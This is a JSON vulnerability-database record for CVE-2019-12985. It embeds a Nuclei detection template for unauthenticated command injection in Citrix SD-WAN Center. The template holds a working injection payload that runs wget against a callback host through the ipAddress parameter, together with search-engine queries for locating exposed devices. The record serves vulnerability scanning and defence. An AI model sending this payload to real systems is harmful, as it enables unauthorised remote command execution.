{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-12985/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-12985/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-12985/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-12985/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-12985/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-12985"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-12985"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2019/CVE-2019-12985.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2019-12985\n\ninfo:\n  name: Citrix SD-WAN Center - Remote Command Injection\n  author: gy741\n  severity: critical\n  description: |\n    Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire Citrix SD-WAN Center infrastructure.\n  remediation: |\n    Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability.\n  reference:\n    - https://www.tenable.com/security/research/tra-2019-31\n    - https://support.citrix.com/article/CTX251987\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-12985\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-12985\n    cwe-id: CWE-78\n    epss-score: 0.39544\n    epss-percentile: 0.9855\n    cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: citrix\n    product: netscaler_sd-wan\n    shodan-query:\n      - http.title:\"Citrix SD-WAN\"\n      - http.title:\"citrix sd-wan\"\n    fofa-query: title=\"citrix sd-wan\"\n    google-query: intitle:\"citrix sd-wan\"\n  tags: cve,cve2019,citrix,rce,unauth,oast,tenable,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /login HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /Collector/diagnostics/ping HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        ipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body_1, \"<title>Citrix SD-WAN</title>\")'\n\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 4b0a00483046022100858b2df1923a71152d57cd5f494d73e91dce7d30b439850d6e9b3a6855427798022100f95237cb802e86280e539eaf9f2e6c6988cd3175d8865e3533cb66b53f49e5dd:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2019-12985"
}